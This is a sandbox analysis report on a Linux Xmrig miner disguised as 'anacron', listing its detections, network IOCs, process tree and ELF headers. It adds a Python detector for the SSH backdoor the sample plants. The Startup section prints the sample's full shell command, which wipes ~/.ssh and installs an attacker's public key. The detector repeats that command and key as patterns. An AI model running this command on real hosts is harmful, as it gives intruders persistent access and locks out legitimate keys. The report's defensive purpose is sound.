ID: 202040
Sample Name: anacron
Cookbook: defaultlinuxfilecookbook.jbs
Start time: 02:46:46
Date: 20/01/2020
Version: 28.0.0 Lapis Lazuli

Table of Contents

Table of Contents (p. 2)
Analysis Report anacron (p. 5)
  Overview (p. 5)
    General Information (p. 5)
    Detection (p. 5)
    Classification (p. 5)
    Mitre Att&ck Matrix (p. 6)
    Signature Overview (p. 7): AV Detection, Bitcoin Miner, Networking, System Summary, Persistence and Installation Behavior, Malware Analysis System Evasion
    Malware Configuration (p. 8)
    Runtime Messages (p. 8)
    Behavior Graph (p. 8)
    Yara Overview (p. 8): Initial Sample (p. 8), PCAP (Network Traffic) (p. 9), Dropped Files (p. 9)
    Sigma Overview (p. 9)
    Joe Sandbox View / Context (p. 9): IPs, Domains, ASN (p. 9), JA3 Fingerprints, Dropped Files (p. 10)
    Antivirus, Machine Learning and Genetic Malware Detection (p. 10): Initial Sample, Dropped Files, Domains, URLs
    Startup (p. 10)
    Created / dropped Files (p. 11)
    Domains and IPs (p. 12): Contacted Domains, URLs from Memory and Binaries, Contacted IPs (p. 12), Public (p. 13)
    Static Info (p. 13): General (p. 13)
      Static ELF Info (p. 13): ELF header (p. 13), Sections, Program Segments, Dynamic Tags (p. 14), Symbols (p. 15)
    Network Behavior (p. 15): Network Port Distribution, TCP Packets, UDP Packets, DNS Queries, DNS Answers
    System Behavior (p. 16)
      Analysis Process: anacron PID: 20758 Parent PID: 20706 (General; File Activities: File Read, Directory Enumerated) (p. 16)
      Analysis Process: anacron PID: 20759 Parent PID: 20758 (General) (p. 16)
      Analysis Process: sh PID: 20759 Parent PID: 20758 (General; File Activities: File Read, File Written) (p. 16)
      Analysis Process: sh PID: 20761 Parent PID: 20759 (General) (p. 17)
      Analysis Process: rm PID: 20761 Parent PID: 20759 (General; File Activities: File Deleted, File Read) (p. 17)
      Analysis Process: sh PID: 20764 Parent PID: 20759 (General) (p. 17)
      Analysis Process: mkdir PID: 20764 Parent PID: 20759 (General; File Activities: File Read, Directory Created) (p. 17)
      Analysis Process: sh PID: 20771 Parent PID: 20759 (General) (p. 18)
      Analysis Process: chmod PID: 20771 Parent PID: 20759 (General; File Activities: File Read, Directory Enumerated, Permission Modified) (p. 18)
      Analysis Process: anacron PID: 20780 Parent PID: 20758 (General; File Activities: File Read, File Written) (p. 18)
      Analysis Process: upstart PID: 20811 Parent PID: 20139 (General) (p. 19)
      Analysis Process: sh PID: 20811 Parent PID: 20139 (General; File Activities: File Read) (p. 19)
      Analysis Process: sh PID: 20812 Parent PID: 20811 (General) (p. 19)
      Analysis Process: date PID: 20812 Parent PID: 20811 (General; File Activities: File Read) (p. 19)
      Analysis Process: sh PID: 20813 Parent PID: 20811 (General) (p. 20)
      Analysis Process: apport-checkreports PID: 20813 Parent PID: 20811 (General; File Activities: File Read, File Written, Directory Enumerated) (p. 20)
      Analysis Process: upstart PID: 20838 Parent PID: 20139 (General) (p. 20)
      Analysis Process: sh PID: 20838 Parent PID: 20139 (General; File Activities: File Read) (p. 20)
      Analysis Process: sh PID: 20839 Parent PID: 20838 (General) (p. 21)
      Analysis Process: date PID: 20839 Parent PID: 20838 (General; File Activities: File Read) (p. 21)
      Analysis Process: sh PID: 20855 Parent PID: 20838 (General) (p. 21)
      Analysis Process: apport-gtk PID: 20855 Parent PID: 20838 (General; File Activities: File Read, File Written, Directory Enumerated) (p. 21)
      Analysis Process: upstart PID: 20868 Parent PID: 20139 (General) (p. 22)
      Analysis Process: sh PID: 20868 Parent PID: 20139 (General; File Activities: File Read) (p. 22)
      Analysis Process: sh PID: 20869 Parent PID: 20868 (General) (p. 22)
      Analysis Process: date PID: 20869 Parent PID: 20868 (General; File Activities: File Read) (p. 22)
      Analysis Process: sh PID: 20870 Parent PID: 20868 (General) (p. 23)
      Analysis Process: apport-gtk PID: 20870 Parent PID: 20868 (General; File Activities: File Read, Directory Enumerated) (p. 23)

Copyright Joe Security LLC 2020

Analysis Report anacron

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 202040
Start date: 20.01.2020
Start time: 02:46:46
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 3m 59s
Hypervisor based Inspection enabled: false
Report: light
Sample file name: anacron
Cookbook file name: defaultlinuxfilecookbook.jbs
Analysis system description: Ubuntu 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
Detection: MAL
Classification: mal76.troj.mine.lin@0/4@4/0

Detection

Strategy: Threshold
Score: 76 (range 0 - 100)
Reporting: (none)
Whitelisted: false
Threat: Xmrig

Classification

(Radar chart image not reproduced.) Axes: Ransomware, Miner, Spreading, Evader, Phishing, Exploiter, Banker, Spyware, Trojan / Bot, Adware. Scale from the centre outwards: clean, suspicious, malicious.

Mitre Att&ck Matrix

Techniques that matched are followed by the number of matching signatures in parentheses; the other entries are the unmarked cells of the matrix.

Initial Access: Valid Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Command-Line Interface (1); Scripting (1); Windows Management Instrumentation; Scheduled Task
Persistence: Hidden Files and Directories (1); Port Monitors; Accessibility Features; System Firmware
Privilege Escalation: Port Monitors; Accessibility Features; Path Interception; DLL Search Order Hijacking
Defense Evasion: Hidden Files and Directories (1); File and Directory Permissions Modification (1); Scripting (1); File Deletion (1)
Credential Access: Credential Dumping; Network Sniffing; Input Capture; Credentials in Files
Discovery: Security Software Discovery (1); File and Directory Discovery (1); System Information Discovery (3); System Network Configuration Discovery
Lateral Movement: Application Deployment Software; Remote Services; Windows Remote Management; Logon Scripts
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
Exfiltration: Data Compressed; Exfiltration Over Other Network Medium; Automated Exfiltration; Data Encrypted
Command and Control: Standard Non-Application Layer Protocol (1); Standard Application Layer Protocol (1); Custom Cryptographic Protocol; Multiband Communication
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups

Signature Overview

• AV Detection • Bitcoin Miner • Networking • System Summary • Persistence and Installation Behavior • Malware Analysis System Evasion


AV Detection:

Antivirus detection for sample

Multi AV Scanner detection for submitted file

Bitcoin Miner:

Yara detected Xmrig cryptocurrency miner

Detected Stratum mining protocol

Found related to Crypto-Mining

Reads CPU information from /proc indicative of miner or evasive malware

Reads CPU information from /sys indicative of miner or evasive malware

Networking:

Performs DNS lookups

Urls found in memory or binary data

System Summary:

Sample contains strings that are potentially command strings

Sample has stripped symbol table

Classification label

Persistence and Installation Behavior:

Sample reads /proc/mounts (often used for finding a writable filesystem)

Counts the number of processes currently running

Creates hidden files and/or directories

Executes commands using a shell command-line interpreter

Executes the "chmod" command used to modify permissions

Executes the "mkdir" command used to create folders

Executes the "rm" command used to delete files or directories

Reads system information from the proc file system

Sample tries to set the executable flag

Malware Analysis System Evasion:

Reads CPU information from /proc indicative of miner or evasive malware

Reads CPU information from /sys indicative of miner or evasive malware

Uses the "" system call to query kernel version information (possible evasion)

Malware Configuration

No configs have been found

Runtime Messages

Command: /tmp/anacron
Exit Code: 0
Exit Code Info: (none)
Killed: False
Standard Output: [2020-01-20 03:47:29.290] unable to open '/tmp/config.json'.
Standard Error: (empty)

The timestamped line is the miner's own log output. The sample still resolved debian-package.center and spoke the Stratum protocol afterwards (see Signature Overview and Network Behavior), so its pool settings do not depend on /tmp/config.json being present.

Behavior Graph

(Graph image not reproduced.) Legend: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is malicious, Internet, Number of created Files. Graph parameters: ID 202040, Sample anacron, Startdate 20/01/2020, Architecture LINUX, Score 76.

Process tree and annotations shown in the graph:
- anacron (the sample)
  - signatures: Antivirus detection for sample; Multi AV Scanner detection for submitted file; Yara detected Xmrig cryptocurrency miner; Sample reads /proc/mounts (often used for finding a writable filesystem); 2 other signatures
  - network: 45.9.148.125 (debian-package.center, Netherlands, ASN unknown), local port 45164 to remote port 80, marked malicious
  - started sh
    - started sh, which ran rm
    - started sh, which ran mkdir
    - started sh, which ran chmod
  - started anacron
- upstart started sh, which started sh (date) and sh (apport-checkreports)
- upstart started sh, which started sh (date) and sh (apport-gtk)
- upstart started sh, which started sh (date) and sh (apport-gtk)

Yara Overview

Initial Sample

Source    Rule               Description                                Author         Strings
anacron   JoeSecurity_Xmrig  Yara detected Xmrig cryptocurrency miner   Joe Security

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Sigma Overview

No Sigma rule has matched

Joe Sandbox View / Context

IPs

Match          Associated Sample Name / URL   Detection   Context
45.9.148.125   (unnamed sample)               malicious
45.9.148.125   cQLmNrun                       malicious

Domains

Match                   Associated Sample Name / URL   Detection   Context
debian-package.center   cron                           malicious   45.9.148.129
debian-package.center   cron                           malicious   45.9.148.129

ASN

Match: unknown (ASN)

Associated Sample Name / URL | Detection | Context
testfile | malicious | 91.189.92.20
Launcher.apk | malicious | 216.58.201.99
5.45.79.15/input/?mark=20200116-wentontravel.com/cuz&tpl=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&engkey=delonghi%20portafilter%20size | malicious | 185.211.246.22
5.45.79.15/input/?mark=20200116-wentontravel.com/cuz&tpl=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&engkey=delonghi portafilter size | malicious | 185.211.246.22
Project2.doc | malicious | 51.15.6.128
https://top4top.io/downloadf-11687unj01-rar.html | malicious | 54.38.152.27
www.ltyuye.com/wp-admin/rrktd1y-1v-75/ | malicious | 23.235.217.105
txfc58.com/wordpress/m2utbn-3ft4c-07947/ | malicious | 185.216.113.122
instructions 01 18 2020.doc | malicious | 23.235.217.105
instructions 01 18 2020.doc | malicious | 217.160.5.123
PO987889-JAN-20-20-Order_Quote,pdf.exe | malicious | 172.217.23.193
koadic_test_online_9997_rundll.vbs | malicious | 79.137.36.9
www.searchnewtabs.com/download | malicious | 52.206.61.22
91.92.66.124/..j/ | malicious | 91.92.66.124
https://gcc01.safelinks.protection.outlook.com/?url=https%3A%2F%2Fsway.office.com%2FUN0jHy70XUb7BIXa%3Fref%3DLink&data=02%7C01%7Cjh.jackson%40trade.gov%7Cc3e4a0c456a7407e91f408d79a641704%7Ca1d183f26c7b4d9ab9945f2f31b3f780%7C1%7C1%7C637147626986386689&sdata=AhWGM0VN8KygMfO7X6%2FHVaDVvk7tiKzPkuCoZ%2FooVfs%3D&reserved=0 | malicious | 209.197.3.24
95.179.163.186 | malicious | 95.179.163.186
https://perfecttux.com | malicious | 147.75.84.39
INVOICE FAF3766_778982019.doc | malicious | 185.216.113.122
INVOICE FAF3766_778982019.doc | malicious | 217.160.5.123
FileZilla_3.46.3_win64_sponsored-setup.exe | malicious | 5.62.44.224

JA3 Fingerprints

No context

Dropped Files

No context

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source    Detection   Scanner      Label
anacron   40%         Virustotal
anacron   100%        Avira        LINUX/BitCoinMiner.hglyx

Dropped Files

No Antivirus matches

Domains

Source                  Detection   Scanner      Label
debian-package.center   0%          Virustotal

URLs

Source                              Detection   Scanner           Label
https://xmrig.com/docs/algorithms   0%          Virustotal
https://xmrig.com/docs/algorithms   0%          Avira URL Cloud   safe

Startup

system is lnxubuntu1

anacron (PID: 20758, Parent: 20706, MD5: 8d5d71c56b1f807edac5ac734feab41a) Arguments: /tmp/anacron
  anacron New Fork (PID: 20759, Parent: 20758)
  sh (PID: 20759, Parent: 20758, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
    sh New Fork (PID: 20761, Parent: 20759)
    rm (PID: 20761, Parent: 20759, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf .ssh
    sh New Fork (PID: 20764, Parent: 20759)
    mkdir (PID: 20764, Parent: 20759, MD5: a97f666f21c85ec62ea47d022263ef41) Arguments: mkdir .ssh
    sh New Fork (PID: 20771, Parent: 20759)
    chmod (PID: 20771, Parent: 20759, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod -R go= /home/user/.ssh
  anacron New Fork (PID: 20780, Parent: 20758)
upstart New Fork (PID: 20811, Parent: 20139)
sh (PID: 20811, Parent: 20139, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
  sh New Fork (PID: 20812, Parent: 20811)
  date (PID: 20812, Parent: 20811, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
  sh New Fork (PID: 20813, Parent: 20811)
  apport-checkreports (PID: 20813, Parent: 20811, MD5: 1a7d84ebc34df04e55ca3723541f48c9) Arguments: /usr/bin/python3 /usr/share/apport/apport-checkreports --system
upstart New Fork (PID: 20838, Parent: 20139)
sh (PID: 20838, Parent: 20139, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
  sh New Fork (PID: 20839, Parent: 20838)
  date (PID: 20839, Parent: 20838, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
  sh New Fork (PID: 20855, Parent: 20838)
  apport-gtk (PID: 20855, Parent: 20838, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
upstart New Fork (PID: 20868, Parent: 20139)
sh (PID: 20868, Parent: 20139, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
  sh New Fork (PID: 20869, Parent: 20868)
  date (PID: 20869, Parent: 20868, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
  sh New Fork (PID: 20870, Parent: 20868)
  apport-gtk (PID: 20870, Parent: 20868, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
cleanup

The sh command line under the sample is its persistence step: it deletes any existing ~/.ssh (including the victim's own authorized keys), writes the attacker's RSA key as the only authorized_keys entry, and removes group and other permissions so that sshd's StrictModes check accepts the directory. The upstart / date / apport-* processes are Ubuntu's crash reporter being started by the sandbox system, not activity of the sample.

Created / dropped Files

/home/user/.ssh/authorized_keys
Process: /bin/sh
File Type: OpenSSH RSA public key
Size (bytes): 389
Entropy (8bit): 5.91239652812259
Encrypted: false
MD5: A420F7A60A40F3FF3A806A01FEB1DFDA
SHA1: 1AE65132B036DE51BCC62F66B51AE362E11182AF
SHA-256: A8460F446BE540410004B1A8DB4083773FA46F7FE76FA84219C93DAA1669F8F2
SHA-512: 1BA854C321D89441291DA2638D65748FFA06923A63FD2BB9BE8A66440236503FB34E375726A8DA679B55CED51DDA82293FFCFB8BB76563E2DA0071222D3247BF
Malicious: false
Reputation: low
Preview: ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr.

/sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages
Process: /tmp/anacron
File Type: ASCII text, with no line terminators
Size (bytes): 6
Entropy (8bit): 1.9182958340544893
Encrypted: false
MD5: 1054DD099E3998ACB4C217F5AE41D8C8
SHA1: 9F649342B81C46321145FB8F13EDD0F61487F1B4
SHA-256: 498A8E5240652961A0C8BCE6BBAB33A705253FF3B4E81403E5CFE3B779263A5A
SHA-512: 03070B43582647A6344B3FFB462DFB4F77814D6ABB77E162A42486B07A13CF0AEBAEB1F2E25003C104808AB9D7ECF6E70EC686C9078F7183BA3E2823216EF4B7
Malicious: false
Reputation: low
Preview: 128129

This path is the kernel's per-NUMA-node count of reserved 2 MB huge pages; a miner raises it so that its scratchpad can be backed by huge pages, which is why the write comes from the sample process itself.

/var/crash/_usr_share_apport_apport-checkreports.1000.crash
Process: /usr/share/apport/apport-checkreports
File Type: ASCII text
Size (bytes): 14923
Entropy (8bit): 4.684369237174026
Encrypted: false
MD5: 62591DEB2982540970B8033F260B349B
SHA1: 72631B02B97594A7D1B83641B26C85105E8B62B1
SHA-256: 931DAED4EDA2C49315FF866273E17758D9420E899244DB2A48043DCC5B12340C
SHA-512: 6F9D6266231081B1FB32A845D22B0CC02F1C7E2EB4FA6CAAA7A8F309E44B44C181BE8CD17D0CC2568E3F69CA88D78ECE3E296A830A289058FA53F6DBC3F5CA08
Malicious: false
Reputation: low
Preview: ProblemType: Crash.Date: Mon Jan 20 03:47:31 2020.ExecutablePath: /usr/share/apport/apport-checkreports.ExecutableTimestamp: 1514927430.InterpreterPath: /usr/bin/python3.5.ProcCmdline: /usr/bin/python3 /usr/share/apport/apport-checkreports --system.ProcCwd: /home/user.ProcEnviron:. LANGUAGE=en_US. PATH=(custom, user). XDG_RUNTIME_DIR=. LANG=en_US.UTF-8. SHELL=/bin/bash.ProcMaps:. 00400000-007a9000 r-xp 00000000 fc:00 217 /usr/bin/python3.5. 009a9000-009ab000 r--p 003a9000 fc:00 217 /usr/bin/python3.5. 009ab000-00a42000 rw-p 003ab000 fc:00 217 /usr/bin/python3.5. 00a42000-00a73000 rw-p 00000000 00:00 0 . 010f8000-0144f000 rw-p 00000000 00:00 0 [heap]. 7f7df59ef000-7f7df5b70000 rw-p 00000000 00:00 0 . 7f7df5b70000-7f7df5b87000 r-xp 00000000 fc:00 2382 /usr/lib/x86_64-linux-gnu/liblz4.so.1.7.1. 7f7df5b87000-7f7df5d86000 ---p 00017000 fc:0

/var/crash/_usr_share_apport_apport-gtk.1000.crash
Process: /usr/share/apport/apport-gtk
File Type: ASCII text
Size (bytes): 47102
Entropy (8bit): 4.494867931830367
Encrypted: false
MD5: 4949187FF25EB31488F0D5DB591FAD08
SHA1: 64D7171189CCE702169C62C441D063C953C86F6A
SHA-256: 8B3DAFECEC14F6BDD7FE2AA80C019F0DB3590D487D8E0FAC63B89E4F09C96032
SHA-512: B29F2FB2E025C128A680A9A68F00D0CDDF3AAA971CD2928705BD876F8AD0194E40CE709B426874D8C4618430C90B46B0F4A1579BC3C090CB236EE272AB0B6794
Malicious: false
Reputation: low
Preview: ProblemType: Crash.Date: Mon Jan 20 03:47:31 2020.ExecutablePath: /usr/share/apport/apport-gtk.ExecutableTimestamp: 1514927430.InterpreterPath: /usr/bin/python3.5.ProcCmdline: /usr/bin/python3 /usr/share/apport/apport-gtk.ProcCwd: /home/user.ProcEnviron:. LANGUAGE=en_US. PATH=(custom, user). XDG_RUNTIME_DIR=<set>. LANG=en_US.UTF-8. SHELL=/bin/bash.ProcMaps:. 00400000-007a9000 r-xp 00000000 fc:00 217 /usr/bin/python3.5. 009a9000-009ab000 r--p 003a9000 fc:00 217 /usr/bin/python3.5. 009ab000-00a42000 rw-p 003ab000 fc:00 217 /usr/bin/python3.5. 00a42000-00a73000 rw-p 00000000 00:00 0 . 01522000-01a45000 rw-p 00000000 00:00 0 [heap]. 7ff67717d000-7ff67727d000 rw-p 00000000 00:00 0 . 7ff67727d000-7ff677294000 r-xp 00000000 fc:00 2382 /usr/lib/x86_64-linux-gnu/liblz4.so.1.7.1. 7ff677294000-7ff677493000 ---p 00017000 fc:00 2382

Both /var/crash files are reports that apport wrote about its own crash (ProblemType: Crash, ExecutablePath under /usr/share/apport) after upstart started it at 02:47:31; they are sandbox-side crash handling, not files written by the sample. Only the authorized_keys file and the nr_hugepages write are attributable to the sample.
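The rm / echo >> / chmod sequence listed under Startup and the authorized_keys file above are this sample's persistence mechanism. The Python below is an example added to this report (it is not Joe Sandbox code and not the sample's): it flags that command sequence in a captured command line, extracts and fingerprints the public key embedded in it, and audits an authorized_keys file against the report's IOCs (the comment mdrfckr, plus any fingerprints passed in). The key and the sh -c argument are transcribed from the report; the other two authorized_keys entries (alice@workstation, backup@nas, the command= option) are constructed test data with made-up moduli, not real keys.

```python
"""Checks for the SSH backdoor this sample installs. Added example for this
report, not Joe Sandbox code: the key and command line are transcribed from the
report, the remaining authorized_keys entries are constructed test data."""
import base64
import hashlib
import re
import struct

# Public key appended to /home/user/.ssh/authorized_keys (transcribed from the report).
BACKDOOR_B64 = ("AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2"
                "a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+"
                "0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+"
                "BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYM"
                "b66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFn"
                "vlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bs"
                "Z0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw==")
# The -c argument of sh PID 20759 from the Startup section, inner quotes unescaped.
CAPTURED_COMMAND = ('cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa ' + BACKDOOR_B64
                    + ' mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~')
IOC_COMMENTS = {"mdrfckr"}

KEY_RE = re.compile(r"""\b(ssh-(?:rsa|ed25519|dss)|ecdsa-sha2-nistp\d+)\s+([A-Za-z0-9+/]+={0,2})(?:\s+([^\s"'>]+))?""")
TAMPER_PATTERNS = {
    "deletes ~/.ssh": r"\brm\s+-rf\s+(?:~/|\$HOME/)?\.ssh\b",
    "appends to authorized_keys": r">>\s*(?:~/|\$HOME/)?\.ssh/authorized_keys\b",
    "strips group/other perms on ~/.ssh": r"\bchmod\s+-R\s+go=\s+(?:~/|\$HOME/)?\.ssh\b",
}


def _read_string(blob, pos):
    """One length-prefixed SSH wire string; returns (bytes, next position)."""
    (n,) = struct.unpack_from(">I", blob, pos)
    return blob[pos + 4:pos + 4 + n], pos + 4 + n


def parse_key(keytype, b64, comment=""):
    """Decode a public key blob: type check, OpenSSH-style SHA256 fingerprint, RSA e and size."""
    blob = base64.b64decode(b64, validate=True)
    wire_type, pos = _read_string(blob, 0)
    if wire_type != keytype.encode():
        raise ValueError("key type field does not match blob")
    fp = base64.b64encode(hashlib.sha256(blob).digest()).decode().rstrip("=")
    key = {"type": keytype, "comment": comment, "fingerprint": "SHA256:" + fp}
    if keytype == "ssh-rsa":                     # blob = string "ssh-rsa", mpint e, mpint n
        e, pos = _read_string(blob, pos)
        n, pos = _read_string(blob, pos)
        key["e"] = int.from_bytes(e, "big")
        key["bits"] = int.from_bytes(n, "big").bit_length()
    return key


def parse_authorized_keys_line(line):
    """authorized_keys grammar: [options] keytype base64 [comment]; None if no key is found."""
    m = KEY_RE.search(line)
    if not m:
        return None
    key = parse_key(m.group(1), m.group(2), m.group(3) or "")
    key["options"] = line[:m.start()].strip()
    return key


def inspect_command(cmd):
    """Tampering indicators matched in a shell command, and the keys embedded in it."""
    hits = [name for name, pat in TAMPER_PATTERNS.items() if re.search(pat, cmd)]
    keys = [parse_key(m.group(1), m.group(2), m.group(3) or "") for m in KEY_RE.finditer(cmd)]
    return hits, keys


def audit_authorized_keys(text, ioc_fingerprints=frozenset()):
    """(line number, verdict, parsed key) for every non-comment line of an authorized_keys file."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        key = parse_authorized_keys_line(line)
        if key is None:
            findings.append((lineno, "unparseable entry", None))
            continue
        reasons = [msg for cond, msg in (
            (key["comment"] in IOC_COMMENTS, "comment matches IOC"),
            (key["fingerprint"] in ioc_fingerprints, "fingerprint matches IOC"),
            # OpenSSH generates e = 65537; the key this sample drops uses e = 37.
            (key.get("e", 65537) != 65537, "unusual RSA exponent %s" % key.get("e")),
        ) if cond]
        findings.append((lineno, "; ".join(reasons) or "ok", key))
    return findings


def _rsa_blob(e, n):
    """Wire-format ssh-rsa blob for the constructed test keys (not real key material)."""
    def mpint(x):
        b = x.to_bytes((x.bit_length() + 8) // 8, "big")   # extra byte keeps the sign bit clear
        return struct.pack(">I", len(b)) + b
    return struct.pack(">I", 7) + b"ssh-rsa" + mpint(e) + mpint(n)


_FAKE_N = (1 << 2047) | 12345                    # a valid 2048-bit mpint, not a real modulus
CONSTRUCTED_FILE = "\n".join([
    "# constructed authorized_keys for this example",
    "ssh-rsa " + base64.b64encode(_rsa_blob(65537, _FAKE_N)).decode() + " alice@workstation",
    "ssh-rsa " + BACKDOOR_B64 + " mdrfckr",
    'command="/usr/bin/backup",no-pty ssh-rsa ' + base64.b64encode(_rsa_blob(65537, _FAKE_N | 2)).decode() + " backup@nas",
])

if __name__ == "__main__":
    hits, keys = inspect_command(CAPTURED_COMMAND)
    print("command indicators:", hits, "| embedded keys:", [(k["bits"], k["e"], k["fingerprint"]) for k in keys])
    for lineno, verdict, key in audit_authorized_keys(CONSTRUCTED_FILE):
        print("line %d: %s" % (lineno, verdict))
```

On a suspect host, pass the contents of each user's ~/.ssh/authorized_keys (and root's) to audit_authorized_keys with the fingerprint that inspect_command reports for the dropped key; the exponent check is a heuristic, since some non-OpenSSH generators also use small exponents, but e = 37 on a key whose comment is an attacker handle is a strong signal here.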

Domains and IPs

Contacted Domains

Name                    IP             Active   Malicious   Antivirus Detection   Reputation
debian-package.center   45.9.148.117   true     false       0%, Virustotal        unknown

URLs from Memory and Binaries

Contacted IPs


Public

IP             Country       ASN     ASN Name   Malicious
45.9.148.125   Netherlands   49447   unknown    true

The DNS answers under Network Behavior return three A records for debian-package.center (45.9.148.117, 45.9.148.125, 45.9.148.129); the sample connected to 45.9.148.125 on port 80, which is the address flagged here, while the Contacted Domains table records the first answer, 45.9.148.117.

Static File Info

General

File type: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped
Entropy (8bit): 6.550050885060555
TrID: ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name: anacron
File size: 2902776
MD5: 8d5d71c56b1f807edac5ac734feab41a
SHA1: ca2064303d74f5fec98d717f35cd8ee20e81b722
SHA256: 49da718733de850ddd7e871fee1d2f041508d28b9cfc58a822786151004a9c2c
SHA512: 514337791f6c2b71e9303899a6206f92eb905c780729008f3f754f256811332caa5d608662272a6eb3b1f3cf70d1ec528509bbe3f68c7960fc9df63c463fce3f
SSDEEP: 49152:m7rTifP8qyUnJ1jIYuOwxC7mQ595+T91hGtZ1:Irm38qyUnJ1jgx0B5evhG
File Content Preview: .ELF...... 4...4....G,.....4. ...(...... pu..pu...... }.!.}.!...... ".. ".. "...... +...,...,. .T...... h<,.hL,.hL,...... +...,...,...... P.td0.#.0.#

Static ELF Info

ELF header

Class: ELF32
Data: 2's complement, little endian
Version: 1 (current)
Machine: Intel 80386
Version Number: 0x1
Type: DYN (Shared object file)
OS/ABI: System V
ABI Version: 0
Entry Point Address: 0xbf34
Flags: 0x0
ELF Header Size: 52
Program Header Offset: 52
Program Header Size: 32
Number of Program Headers: 9
Section Header Offset: 2901776
Section Header Size: 40
Number of Section Headers: 25
Header String Table Index: 24

Sections

Name               Type         Address     Offset      Size        EntSize   Flags   Flags Description   Link   Info   Align
(null)             NULL         0x0         0x0         0x0         0x0       0x0                         0      0      0
.gnu.hash          GNU_HASH     0x154       0x154       0x18        0x4       0x2     A                   2      0      4
.dynsym            DYNSYM       0x16c       0x16c       0x10        0x10      0x2     A                   3      1      4
.dynstr            STRTAB       0x17c       0x17c       0x1         0x0       0x2     A                   0      0      1
.rel.dyn           REL          0x180       0x180       0x73f0      0x8       0x2     A                   2      0      4
.init              PROGBITS     0x8000      0x8000      0x11        0x0       0x6     AX                  0      0      1
.plt               PROGBITS     0x8020      0x8020      0x80        0x4       0x6     AX                  0      0      16
.text              PROGBITS     0x80a0      0x80a0      0x2194d1    0x0       0x6     AX                  0      0      16
.fini              PROGBITS     0x221571    0x221571    0xc         0x0       0x6     AX                  0      0      1
.rodata            PROGBITS     0x222000    0x222000    0x1c230     0x0       0x2     A                   0      0      32
.eh_frame_hdr      PROGBITS     0x23e230    0x23e230    0xbf7c      0x0       0x2     A                   0      0      4
.eh_frame          PROGBITS     0x24a1ac    0x24a1ac    0x6f068     0x0       0x2     A                   0      0      4
